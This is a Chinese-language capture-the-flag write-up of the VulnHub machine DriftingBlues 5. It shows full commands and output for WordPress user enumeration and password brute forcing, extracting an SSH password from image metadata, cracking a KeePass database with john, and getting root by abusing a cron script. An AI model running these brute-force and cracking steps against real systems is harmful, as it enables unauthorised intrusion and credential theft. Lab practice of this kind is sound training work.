DriftingBlues 5
靶机信息
名称: DriftingBlues: 5
地址:- https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova
复制代码 识别IP地址
- (kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
- 192.168.56.100 08:00:27:a6:7d:47 1 60 PCS Systemtechnik GmbH
- 192.168.56.128 08:00:27:12:bf:76 1 60 PCS Systemtechnik GmbH
复制代码 NMAP扫描
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
- Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 02:50 EDT
- Nmap scan report for 192.168.56.128
- Host is up (0.00019s latency).
- Not shown: 65533 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
- | ssh-hostkey:
- | 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
- | 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
- |_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
- 80/tcp open http Apache httpd 2.4.38 ((Debian))
- |_http-generator: WordPress 5.6.2
- |_http-title: diary – Just another WordPress site
- |_http-server-header: Apache/2.4.38 (Debian)
- MAC Address: 08:00:27:12:BF:76 (Oracle VirtualBox virtual NIC)
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
复制代码 NMAP扫描结果表明目标主机有2个开放端口:22(SSH),80(HTTP)
Get Foothold
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ curl http://192.168.56.128/robots.txt
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <hr>
- <address>Apache/2.4.38 (Debian) Server at 192.168.56.128 Port 80</address>
- </body></html>
复制代码 目标主机没有robots.txt文件。- ──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ nikto -h http://192.168.56.128
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.128
- + Target Hostname: 192.168.56.128
- + Target Port: 80
- + Start Time: 2023-05-19 02:53:37 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.4.38 (Debian)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'link' found, with contents: <http://192.168.56.128/index.php/wp-json/>; rel="https://api.w.org/"
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'x-redirect-by' found, with contents: WordPress
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + OSVDB-3233: /icons/README: Apache default file found.
- + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
- + /wp-links-opml.php: This WordPress script reveals the installed version.
- + OSVDB-3092: /license.txt: License file found may identify site software.
- + /: A Wordpress installation was found.
- + Cookie wordpress_test_cookie created without the httponly flag
- + OSVDB-3268: /wp-content/uploads/: Directory indexing found.
- + /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
- + /wp-login.php: Wordpress login found
- + 7915 requests: 0 error(s) and 15 item(s) reported on remote host
- + End Time: 2023-05-19 02:54:42 (GMT-4) (65 seconds)
复制代码 nikto工具运行结果表明目标主机运行wordpress,在尝试扫描wordpress用户名和插件之间,看有无其他的目录:- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ gobuster dir -u http://192.168.56.128 -oN nmap_full_scan -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.bak,.js,.txt
- ===============================================================
- Gobuster v3.5
- by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
- ===============================================================
- [+] Url: http://192.168.56.128
- [+] Method: GET
- [+] Threads: 10
- [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- [+] Negative Status codes: 404
- [+] User Agent: gobuster/3.5
- [+] Extensions: bak,txt,php,html,js
- [+] Timeout: 10s
- ===============================================================
- 2023/05/19 02:56:08 Starting gobuster in directory enumeration mode
- ===============================================================
- /.html (Status: 403) [Size: 279]
- /.php (Status: 403) [Size: 279]
- /index.php (Status: 301) [Size: 0] [--> http://192.168.56.128/]
- /wp-content (Status: 301) [Size: 321] [--> http://192.168.56.128/wp-content/]
- /license.txt (Status: 200) [Size: 19915]
- /wp-login.php (Status: 200) [Size: 6675]
- /wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.128/wp-includes/]
- /readme.html (Status: 200) [Size: 7278]
- /wp-trackback.php (Status: 200) [Size: 135]
- /wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.128/wp-admin/]
- /xmlrpc.php (Status: 405) [Size: 42]
- /.html (Status: 403) [Size: 279]
- /.php (Status: 403) [Size: 279]
- /wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.56.128/wp-login.php?action=register]
- /server-status (Status: 403) [Size: 279]
- Progress: 1322241 / 1323366 (99.91%)
- ===============================================================
- 2023/05/19 03:00:52 Finished
- ===============================================================
复制代码 gobuster工具没有扫描出更有用的的目录或者文件。- ─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ wpscan --url http://192.168.56.128 -e u,p
- [+] abuzerkomurcu
- | Found By: Author Posts - Author Pattern (Passive Detection)
- | Confirmed By:
- | Rss Generator (Passive Detection)
- | Wp Json Api (Aggressive Detection)
- | - http://192.168.56.128/index.php/wp-json/wp/v2/users/?per_page=100&page=1
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Login Error Messages (Aggressive Detection)
- [+] satanic
- | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Confirmed By: Login Error Messages (Aggressive Detection)
- [+] gill
- | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Confirmed By: Login Error Messages (Aggressive Detection)
- [+] collins
- | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Confirmed By: Login Error Messages (Aggressive Detection)
- [+] gadd
- | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Confirmed By: Login Error Messages (Aggressive Detection)
复制代码 wpscan工具扫描出用户名,(备注:没有扫描出有漏洞的插件)- ─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ wpscan --url http://192.168.56.128 -U abuzerkomurcu -P /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
复制代码 用经典的rockyou.txt字典没有破解出来,考虑到目标主机页面内容较多,是否密码存在页面中,因此用cewl工具生成字典:- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ cewl -d 3 http://192.168.56.128 -w dict
- CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
复制代码- ─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ wpscan --url http://192.168.56.128 -U users.dict -P dict
- [!] Valid Combinations Found:
- | Username: gill, Password: interchangeable
复制代码 但是只有gill的密码被破解出来,利用该密码登录,发现gill并不是管理员用户,在媒体中发现了一张图片,这张图片并没有出现在前端页面中,比较可疑,将其下载到Kali Linux本地。- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ exiftool dblogo.png
- ExifTool Version Number : 12.44
- File Name : dblogo.png
- Directory : .
- File Size : 19 kB
- File Modification Date/Time : 2023:05:19 03:31:44-04:00
- File Access Date/Time : 2023:05:19 03:31:44-04:00
- File Inode Change Date/Time : 2023:05:19 03:31:44-04:00
- File Permissions : -rw-r--r--
- File Type : PNG
- File Type Extension : png
- MIME Type : image/png
- Image Width : 300
- Image Height : 300
- Bit Depth : 8
- Color Type : RGB with Alpha
- Compression : Deflate/Inflate
- Filter : Adaptive
- Interlace : Noninterlaced
- SRGB Rendering : Perceptual
- Gamma : 2.2
- Pixels Per Unit X : 2835
- Pixels Per Unit Y : 2835
- Pixel Units : meters
- XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
- Creator Tool : Adobe Photoshop CC 2018 (Windows)
- Create Date : 2021:02:24 02:55:28+03:00
- Metadata Date : 2021:02:24 02:55:28+03:00
- Modify Date : 2021:02:24 02:55:28+03:00
- Instance ID : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
- Document ID : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
- Original Document ID : xmp.did:5890be6c-649b-0248-af9b-19889727200c
- Color Mode : RGB
- ICC Profile Name : sRGB IEC61966-2.1
- Format : image/png
- History Action : created, saved
- History Instance ID : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
- History When : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
- History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
- History Changed : /
- Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
- Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
- Document Ancestors : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
- Image Size : 300x300
- Megapixels : 0.090
复制代码 利用exiftool工具得到了ssh密码,利用该密码登录其SSH:- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ ssh gill@192.168.56.128
- The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
- ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
- This host key is known by the following other names/addresses:
- ~/.ssh/known_hosts:35: [hashed name]
- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
- Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
- gill@192.168.56.128's password:
- Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
- The programs included with the Debian GNU/Linux system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
- permitted by applicable law.
- gill@driftingblues:~$ id
- uid=1000(gill) gid=1000(gill) groups=1000(gill)
- gill@driftingblues:~$ ls -alh
- total 24K
- drwxr-xr-x 4 gill gill 4.0K May 19 02:33 .
- drwxr-xr-x 4 root root 4.0K Feb 24 2021 ..
- drwx------ 3 gill gill 4.0K May 19 02:33 .gnupg
- -rwx------ 1 gill gill 2.0K Feb 24 2021 keyfile.kdbx
- drwx------ 2 gill gill 4.0K Feb 24 2021 .ssh
- -r-x------ 1 gill gill 1.8K Jan 3 2021 user.txt
- gill@driftingblues:~$ cat user.txt
- flag 1/2
- ░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
- ░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
- ░░░░█░░░░░░░░░░░░░░░░░░░░░░█
- ░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
- ░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
- █░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
- █░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
- ░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
- ░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
- ░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
- ░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
- ░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
- ░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
- ░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
- ░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
- ░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
- ░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
- ░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
- ░░█░░▌░█░░█░░█░░░█░░█░░█
- ░░█░░▀▀░░██░░█░░░█░░█░░█
- ░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
- gill@driftingblues:~$
复制代码 Privilege Escalation
在gill家目录中有文件keyfile.kdbx,肯定非常有用,将其下载到Kali Linux。- 通过KeePass密码安全创建的数据文件称为KDBX文件,它们通常所说的KeePass的密码数据库。这些文件包含密码的加密数据库,其中如果用户设置一个主密码,并通过主密码访问他们,他们只能查看。当涉及到的电子邮件帐户的个人登录凭据,电子商务网站,视窗,FTP站点和其他目的的安全存储KDBX文件是很有用的。
复制代码- ──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ wget http://192.168.56.128:8000/keyfile.kdbx
- --2023-05-19 03:36:26-- http://192.168.56.128:8000/keyfile.kdbx
- Connecting to 192.168.56.128:8000... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2030 (2.0K) [application/octet-stream]
- Saving to: ‘keyfile.kdbx’
- keyfile.kdbx 100%[============================================================================>] 1.98K --.-KB/s in 0s
- 2023-05-19 03:36:26 (217 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ keepass2john keyfile.kdbx > keyfile_hash
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
- └─$ john --wordlist=/usr/share/wordlists/rockyou.txt keyfile_hash
- Using default input encoding: UTF-8
- Loaded 1 password hash (KeePass [SHA256 AES 32/64])
- Cost 1 (iteration count) is 60000 for all loaded hashes
- Cost 2 (version) is 2 for all loaded hashes
- Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- porsiempre (keyfile)
- 1g 0:00:01:23 DONE (2023-05-19 03:38) 0.01196g/s 82.44p/s 82.44c/s 82.44C/s winston1..palomita
- Use the "--show" option to display all of the cracked passwords reliably
- Session completed.
复制代码 用得到的密码到下面的网站破解文件:得到5个类似于密码的字符串,但是并不是root密码- 2real4surreal
- buddyretard
- closet313
- exalted
- fracturedocean
- zakkwylde
复制代码 将pyps64工具上传目标主机,发现有个进程会被每分钟执行一次:- 2023/05/19 02:46:01 CMD: UID=0 PID=1693 | /bin/sh -c /root/key.sh
复制代码 而根目录下有/keyfolder,从/root/key.sh脚本的名字看出应该是跟密码有关,而/keyfolder为密码目录,但是当前该目录下什么都没有,因此将前面破解得到的类似于密码的字符串作为文件名创建文件,但是然后看该目录下有无变化,而且需要删掉创建的文件,说实话,这个漏洞太难发现了,也是参考别人的做法。- gill@driftingblues:/keyfolder$ cd /tmp
- gill@driftingblues:/tmp$ touch 2real4surreal
- gill@driftingblues:/tmp$ mv 2real4surreal /keyfolder/
- gill@driftingblues:/tmp$ ls -alh /keyfolder/*
- -rw-r--r-- 1 gill gill 0 May 19 03:01 /keyfolder/2real4surreal
- -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/buddyretard
- -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/closet313
- -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/exalted
- -rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/fracturedocean
- -rw-r--r-- 1 gill gill 0 May 19 02:56 /keyfolder/zakkwylde
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 8.0K
- drwx---rwx 2 root root 4.0K May 19 03:01 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw-r--r-- 1 gill gill 0 May 19 03:01 2real4surreal
- -rw-r--r-- 1 gill gill 0 May 19 02:55 buddyretard
- -rw-r--r-- 1 gill gill 0 May 19 02:55 closet313
- -rw-r--r-- 1 gill gill 0 May 19 02:55 exalted
- -rw-r--r-- 1 gill gill 0 May 19 02:55 fracturedocean
- -rw-r--r-- 1 gill gill 0 May 19 02:56 zakkwylde
- gill@driftingblues:/tmp$ rm -rf /keyfolder/*
- gill@driftingblues:/tmp$ touch buddyretard
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 8.0K
- drwx---rwx 2 root root 4.0K May 19 03:02 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- gill@driftingblues:/tmp$ mv buddyretard /keyfolder/
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 8.0K
- drwx---rwx 2 root root 4.0K May 19 03:03 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw-r--r-- 1 gill gill 0 May 19 03:02 buddyretard
- gill@driftingblues:/tmp$ rm -rf /keyfolder/*
- gill@driftingblues:/tmp$ touch closet313
- gill@driftingblues:/tmp$ mv closet313 /keyfolder/
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 8.0K
- drwx---rwx 2 root root 4.0K May 19 03:03 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw-r--r-- 1 gill gill 0 May 19 03:03 closet313
- gill@driftingblues:/tmp$ rm -rf /keyfolder/*
- gill@driftingblues:/tmp$ touch exalted
- gill@driftingblues:/tmp$ mv exalted /keyfolder/
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 8.0K
- drwx---rwx 2 root root 4.0K May 19 03:04 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw-r--r-- 1 gill gill 0 May 19 03:03 exalted
- gill@driftingblues:/tmp$ rm -rf /keyfolder/*
- gill@driftingblues:/tmp$ touch fracturedocean
- gill@driftingblues:/tmp$ mv fracturedocean /keyfolder/
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 8.0K
- drwx---rwx 2 root root 4.0K May 19 03:04 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw-r--r-- 1 gill gill 0 May 19 03:04 fracturedocean
- gill@driftingblues:/tmp$ ls -alh /keyfolder/
- total 12K
- drwx---rwx 2 root root 4.0K May 19 03:05 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw-r--r-- 1 gill gill 0 May 19 03:04 fracturedocean
- -rw-r--r-- 1 root root 29 May 19 03:05 rootcreds.txt
- gill@driftingblues:/tmp$ cat /keyfolder/rootcreds.txt
- root creds
- imjustdrifting31
- gill@driftingblues:/tmp$
复制代码- gill@driftingblues:/tmp$ su - root
- Password:
- root@driftingblues:~# id
- uid=0(root) gid=0(root) groups=0(root)
- root@driftingblues:~# cd /root
- root@driftingblues:~# ls -alh
- total 20K
- drwx------ 2 root root 4.0K Mar 8 2021 .
- drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
- -rw------- 1 root root 45 Mar 8 2021 .bash_history
- -rwx------ 1 root root 205 Feb 24 2021 key.sh
- -r-x------ 1 root root 1.8K Dec 17 2020 root.txt
- root@driftingblues:~# cat root.txt
- flag 2/2
- ░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
- ░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
- ░░░░█░░░░░░░░░░░░░░░░░░░░░░█
- ░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
- ░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
- █░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
- █░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
- ░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
- ░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
- ░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
- ░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
- ░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
- ░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
- ░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
- ░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
- ░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
- ░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
- ░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
- ░░█░░▌░█░░█░░█░░░█░░█░░█
- ░░█░░▀▀░░██░░█░░░█░░█░░█
- ░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
- congratulations!
- root@driftingblues:~# cat key.sh
- #!/bin/bash
- if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
- echo "root creds" >> /keyfolder/rootcreds.txt
- echo "" >> /keyfolder/rootcreds.txt
- echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
- fi
- root@driftingblues:~#
复制代码 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |